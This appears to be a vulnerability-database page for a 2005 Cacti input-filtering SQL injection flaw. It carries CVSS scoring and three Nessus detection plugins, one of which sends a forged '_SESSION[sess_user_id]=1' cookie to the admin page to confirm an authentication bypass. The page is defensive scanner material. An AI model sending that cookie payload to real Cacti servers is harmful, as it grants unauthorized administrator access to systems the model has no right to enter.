Vulnerabilities > CVE-2005-2148 - SQL Injection vulnerability in RaXnet Cacti Input Filter

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL

Summary

Cacti 0.8.6e and earlier does not perform proper input validation to protect against common attacks, which allows remote attackers to execute arbitrary commands or SQL. The attacker supplies a legitimate value for a parameter in a POST body or a cookie while placing the attack string for the same parameter in the URL: get_request_var then returns and cleanses the wrong copy (the benign value that wins in $_REQUEST), while the original malicious $_GET value remains unmodified and available to the script, as demonstrated in (1) graph_image.php and (2) graph.php.

Nessus

  • NASL familyCGI abuses
    NASL idCACTI_086F.NASL
    descriptionThe Cacti application running on the remote web server is affected by an authentication bypass vulnerability.
    last seen2020-06-01
    modified2020-06-02
    plugin id18619
    published2005-07-05
    reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/18619
    titleCacti < 0.8.6f Authentication Bypass Vulnerability
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    include("compat.inc");
    
    if (description)
    {
      script_id(18619);
      script_version("1.21");
      script_cvs_date("Date: 2018/06/14 12:21:47");

      # Both CVEs were fixed in the same 0.8.6f release. The active check in
      # this plugin appears to exercise the session-tampering flaw
      # (CVE-2005-2149) rather than the graph_*.php input filter bug.
      script_cve_id("CVE-2005-2148", "CVE-2005-2149");
      script_bugtraq_id(14027, 14130);

      script_name(english:"Cacti < 0.8.6f Authentication Bypass Vulnerability");
      script_summary(english:"Attempts to exploit the vulnerability.");

      # Synopsis / description / solution shown to the user.
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server is running a PHP application that is affected by
    an authentication bypass vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The Cacti application running on the remote web server is affected by
    an authentication bypass vulnerability.");
      script_set_attribute(attribute:"solution", value:"Upgrade to Cacti 0.8.6f or later.");

      # References: the three hardened-php.net advisories (archived copies)
      # plus the vendor release notes for 0.8.6f.
      # https://web.archive.org/web/20061130123447/http://www.hardened-php.net/index.30.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?a392bde5");
      # https://web.archive.org/web/20061130122909/http://www.hardened-php.net/index.31.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?79df242f");
      # https://web.archive.org/web/20060502023335/http://www.hardened-php.net/index.33.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8090490f");
      script_set_attribute(attribute:"see_also", value:"http://www.cacti.net/release_notes_0_8_6f.php");

      # Scoring and exploitability.
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");

      # Timeline.
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/07/02");
      script_set_attribute(attribute:"patch_publication_date", value:"2005/07/01");
      script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/05");

      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:cacti:cacti");
      script_end_attributes();

      # ACT_ATTACK: this plugin sends a crafted request to the target rather
      # than only fingerprinting it.
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
      script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

      # Needs a Cacti install discovered by the detection plugin.
      script_dependencies("cacti_detect.nasl");
      script_require_ports("Services/www", 80);
      script_require_keys("www/cacti");
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    
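    get_install_count(app_name:'cacti', exit_if_zero:TRUE);

    port = get_http_port(default:80, php:TRUE);
    install = get_install_from_kb(appname:'cacti', port:port, exit_on_fail:TRUE);

    # Our hand-built Cookie header must not be merged with or overridden by
    # anything the cookie jar collected during detection.
    disable_cookiejar();
    dir = install['dir'];
    url = strcat(dir, "/user_admin.php");
    install_url = build_url(qs:url, port:port);

    # Marker that is only rendered on the user-management page: the link for
    # creating a new user.
    marker = 'href="user_admin.php?action=user_edit">Add';

    # Baseline: request the admin page with no session cookie at all. If it
    # already renders for an anonymous client, the page is exposed for some
    # other reason (authentication disabled, a front-end injecting sessions,
    # etc.) and a positive result below would not prove the cookie-based
    # bypass. Stop here rather than attribute that to this CVE.
    r = http_send_recv3(port:port, method:'GET', item:url, exit_on_fail:TRUE);
    if (marker >< r[2])
      exit(0, "The page at " + install_url + " is reachable without any session cookie, so the cookie-based authentication bypass cannot be established.");

    # Attack (CVE-2005-2149): per the advisory, config.php lets a client set
    # the 'no_http_headers' switch and then supply its own session state, so a
    # '_SESSION[...]' cookie is accepted as the session. sess_user_id=1 is
    # assumed to be the built-in admin account (true for a stock install; not
    # verified here).
    r = http_send_recv3(port:port, method:'GET', item:url,
      add_headers:make_array("Cookie", "_SESSION[sess_user_id]=1;no_http_headers=1;"),
      exit_on_fail:TRUE);

    # There's a problem if the forged session gets us the "Add user" link.
    if (marker >< r[2])
    {
      if (report_verbosity > 0)
      {
        # Include the exact request so the finding can be reproduced by hand.
        report =
          '\nNessus was able to reach the Cacti user administration page' +
          '\nwithout authenticating, using the following request :' +
          '\n' +
          '\n  ' + http_last_sent_request() +
          '\n';
        security_hole(port:port, extra:report);
      }
      else security_hole(port);
      exit(0);
    }
    audit(AUDIT_WEB_APP_NOT_AFFECTED, "Cacti", install_url);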
    
  • NASL familyCGI abuses
    NASL idCACTI_086F_VCHECK.NASL
descriptionAccording to its self-reported version number, the Cacti application running on the remote web server is prior to version 0.8.6f. It is, therefore, potentially affected by the following vulnerabilities : - Multiple vulnerabilities exist due to improper input validation in 'graph_image.php' and 'graph.php' (CVE-2005-2148). - A flaw exists in 'config.php' that allows remote attackers to set the 'no_http_headers' switch and then modify session information in order to gain the privileges necessary to perform SQL injection attacks (CVE-2005-2149). This is a version-only check and reports only when paranoid reporting is enabled.
    last seen2020-06-01
    modified2020-06-02
    plugin id81602
    published2015-03-03
    reporterThis script is Copyright (C) 2015-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/81602
    titleCacti < 0.8.6f Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(81602);
      script_version("1.5");
      script_cvs_date("Date: 2018/06/14 12:21:47");

      script_cve_id("CVE-2005-2148", "CVE-2005-2149");
      script_bugtraq_id(14027, 14130);

      script_name(english:"Cacti < 0.8.6f Multiple Vulnerabilities");
      script_summary(english:"Checks the version of Cacti.");

      # Text shown to the user. This is a version check, so the description
      # says "potentially affected".
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server is running a PHP application that is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its self-reported version number, the Cacti application
    running on the remote web server is prior to version 0.8.6f. It is,
    therefore, potentially affected by the following vulnerabilities :

      - Multiple vulnerabilities exist due to improper input
        validation in 'graph_image.php' and 'graph.php'.
        (CVE-2005-2148)

      - A flaw exists in 'config.php' that allows remote
        attackers to set the 'no_http_headers' switch and then
        modify session information in order to gain the
        privileges necessary to perform SQL injection attacks.
        (CVE-2005-2149)");
      script_set_attribute(attribute:"solution", value:"Upgrade to Cacti 0.8.6f or later.");

      # References: archived hardened-php.net advisories and vendor notes.
      # https://web.archive.org/web/20061130123447/http://www.hardened-php.net/index.30.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?a392bde5");
      # https://web.archive.org/web/20061130122909/http://www.hardened-php.net/index.31.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?79df242f");
      # https://web.archive.org/web/20060502023335/http://www.hardened-php.net/index.33.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8090490f");
      script_set_attribute(attribute:"see_also", value:"http://www.cacti.net/release_notes_0_8_6f.php");

      # Scoring and exploitability.
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");

      # Timeline. The plugin itself was added a decade after the fix.
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/07/02");
      script_set_attribute(attribute:"patch_publication_date", value:"2005/07/01");
      script_set_attribute(attribute:"plugin_publication_date", value:"2015/03/03");

      # potential_vulnerability: version-based, no request is sent to confirm.
      script_set_attribute(attribute:"potential_vulnerability", value:"true");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:cacti:cacti");
      script_end_attributes();

      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
      script_copyright(english:"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.");

      # Only runs when Cacti was detected and paranoid reporting is on.
      script_dependencies("cacti_detect.nasl");
      script_require_ports("Services/www", 80);
      script_require_keys("installed_sw/cacti", "www/PHP", "Settings/ParanoidReport");

      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("install_func.inc");
    
    # Version-only check: nothing is sent to confirm, so it is gated behind
    # paranoid reporting to limit false positives from backported fixes.
    if (report_paranoia < 2) audit(AUDIT_PARANOID);

    app = 'cacti';
    get_install_count(app_name:app, exit_if_zero:TRUE);

    port = get_http_port(default:80, php:TRUE);

    install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);
    version = install['version'];
    install_url = build_url(qs:install['path'], port:port);

    # Cacti versions look like "0.8.6e": numeric major and minor, then a patch
    # component that may carry a single-letter suffix.
    parts = split(version, sep:'.', keep:FALSE);
    major = int(parts[0]);
    minor = int(parts[1]);
    patch = parts[2];

    # Affected: 0.x with x < 8, or 0.8.0 - 0.8.5 (any suffix), or 0.8.6
    # through 0.8.6e. 0.8.6f is the fixed release.
    affected = FALSE;
    if (major == 0)
    {
      if (minor < 8) affected = TRUE;
      else if (minor == 8 && patch =~ '^([0-5][a-z]?|6[a-e]?)$') affected = TRUE;
    }

    if (!affected) audit(AUDIT_WEB_APP_NOT_AFFECTED, "Cacti", install_url, version);

    # Let downstream plugins know this host has a known SQL injection.
    set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);

    if (report_verbosity > 0)
    {
      report =
        '\n  URL               : ' + install_url +
        '\n  Installed version : ' + version +
        '\n  Fixed version     : 0.8.6f' +
        '\n';
      security_hole(port:port, extra:report);
    }
    else security_hole(port);
    exit(0);
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-764.NASL
    descriptionSeveral vulnerabilities have been discovered in cacti, a round-robin database (RRD) tool that helps create graphs from database information. The Common Vulnerabilities and Exposures Project identifies the following problems : - CAN-2005-1524 Maciej Piotr Falkiewicz and an anonymous researcher discovered an input validation bug that allows an attacker to include arbitrary PHP code from remote sites which will allow the execution of arbitrary code on the server running cacti. - CAN-2005-1525 Due to missing input validation cacti allows a remote attacker to insert arbitrary SQL statements. - CAN-2005-1526 Maciej Piotr Falkiewicz discovered an input validation bug that allows an attacker to include arbitrary PHP code from remote sites which will allow the execution of arbitrary code on the server running cacti. - CAN-2005-2148 Stefan Esser discovered that the update for the above mentioned vulnerabilities does not perform proper input validation to protect against common attacks. - CAN-2005-2149 Stefan Esser discovered that the update for CAN-2005-1525 allows remote attackers to modify session information to gain privileges and disable the use of addslashes to protect against SQL injection.
    last seen2020-06-01
    modified2020-06-02
    plugin id19258
    published2005-07-21
    reporterThis script is Copyright (C) 2005-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/19258
    titleDebian DSA-764-1 : cacti - several vulnerabilities
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-764. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(19258);
      script_version("1.23");
      script_cvs_date("Date: 2019/08/02 13:32:18");

      # DSA-764 bundles the original flaws (CAN-2005-1524/1525/1526) with the
      # two issues in their incomplete fix (CAN-2005-2148/2149).
      script_cve_id("CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526", "CVE-2005-2148", "CVE-2005-2149");
      script_xref(name:"DSA", value:"764");

      script_name(english:"Debian DSA-764-1 : cacti - several vulnerabilities");
      script_summary(english:"Checks dpkg output for the updated package");

      # Advisory text (copyright SPI, see header).
      script_set_attribute(attribute:"synopsis", value:"The remote Debian host is missing a security-related update.");
      script_set_attribute(attribute:"description", value:
    "Several vulnerabilities have been discovered in cacti, a round-robin
    database (RRD) tool that helps create graphs from database
    information. The Common Vulnerabilities and Exposures Project
    identifies the following problems :

      - CAN-2005-1524
        Maciej Piotr Falkiewicz and an anonymous researcher
        discovered an input validation bug that allows an
        attacker to include arbitrary PHP code from remote sites
        which will allow the execution of arbitrary code on the
        server running cacti.

      - CAN-2005-1525

        Due to missing input validation cacti allows a remote
        attacker to insert arbitrary SQL statements.

      - CAN-2005-1526

        Maciej Piotr Falkiewicz discovered an input validation
        bug that allows an attacker to include arbitrary PHP
        code from remote sites which will allow the execution of
        arbitrary code on the server running cacti.

      - CAN-2005-2148

        Stefan Esser discovered that the update for the above
        mentioned vulnerabilities does not perform proper input
        validation to protect against common attacks.

      - CAN-2005-2149

        Stefan Esser discovered that the update for
        CAN-2005-1525 allows remote attackers to modify session
        information to gain privileges and disable the use of
        addslashes to protect against SQL injection.");
      script_set_attribute(attribute:"solution", value:
    "Upgrade the cacti package.

    For the old stable distribution (woody) these problems have been fixed
    in version 0.6.7-2.5.

    For the stable distribution (sarge) these problems have been fixed in
    version 0.8.6c-7sarge2.");

      # References: the two Debian bug reports and the advisory itself.
      script_set_attribute(attribute:"see_also", value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=316590");
      script_set_attribute(attribute:"see_also", value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=315703");
      script_set_attribute(attribute:"see_also", value:"http://www.debian.org/security/2005/dsa-764");

      # Scoring: rated complete C/I/A because the bundle includes remote
      # PHP code inclusion (CAN-2005-1524/1526), not just SQL injection.
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");

      # Local (dpkg-based) check covering woody (3.0) and sarge (3.1).
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:cacti");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1");

      # Timeline.
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/06/22");
      script_set_attribute(attribute:"patch_publication_date", value:"2005/07/21");
      script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/21");
      script_end_attributes();

      script_category(ACT_GATHER_INFO);
      script_family(english:"Debian Local Security Checks");
      script_copyright(english:"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.");

      # Requires the SSH-collected package list.
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    # Bail out cleanly unless local checks ran on a Debian host and produced
    # a package list.
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);

    # Fixed package versions from DSA-764, one per supported release.
    vulnerable = 0;
    if (deb_check(release:"3.0", prefix:"cacti", reference:"0.6.7-2.5")) vulnerable++;
    if (deb_check(release:"3.1", prefix:"cacti", reference:"0.8.6c-7sarge2")) vulnerable++;

    if (!vulnerable) audit(AUDIT_HOST_NOT, "affected");

    # deb_report_get() carries the installed-vs-fixed version details.
    if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
    else security_hole(0);
    exit(0);